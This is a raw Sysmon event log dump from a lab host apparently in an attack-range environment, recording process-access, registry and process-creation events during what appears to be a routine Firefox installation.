13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.974{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.984{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXE"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Mozilla Firefox\AccessibleHandler.dll"C:\Program Files\Mozilla 
Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000016163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:52.974{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exeHKCR\CLSID\{1814CEEB-49E2-407F-AF99-FA755A7D2607}\InProcServer32\(Default)C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll 10341000x800000000000000016162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.958{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.958{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
